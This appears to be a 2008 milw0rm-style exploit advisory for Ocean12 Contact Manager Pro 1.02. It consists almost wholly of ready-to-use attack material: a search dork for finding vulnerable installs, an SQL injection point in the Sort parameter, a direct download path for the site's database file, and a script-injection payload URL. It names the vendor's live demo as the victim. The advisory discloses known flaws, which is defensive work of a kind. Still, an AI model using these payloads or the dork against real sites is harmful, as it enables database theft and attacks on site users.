23 lines
No EOL
828 B
Text
23 lines
No EOL
828 B
Text
#########################################################
|
|
---------------------------------------------------------
|
|
Portal Name: Ocean12 Contact Manager Pro
|
|
Version : 1.02
|
|
Vendor : http://ocean12tech.com/products/contact
|
|
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
|
|
Author : Pouya_Server , Pouya.s3rver@Gmail.com
|
|
Vulnerability : (DDV,XSS,SQL)
|
|
---------------------------------------------------------
|
|
#########################################################
|
|
[SQL]:
|
|
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
|
|
|
|
[Database Disclosure Vulnerability]:
|
|
http://site.com/path/o12con.mdb
|
|
|
|
[XSS]:
|
|
http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server
|
|
---------------------------------
|
|
Victem :
|
|
http://ocean12tech.com/products/contact/demo
|
|
|
|
# milw0rm.com [2008-11-27] |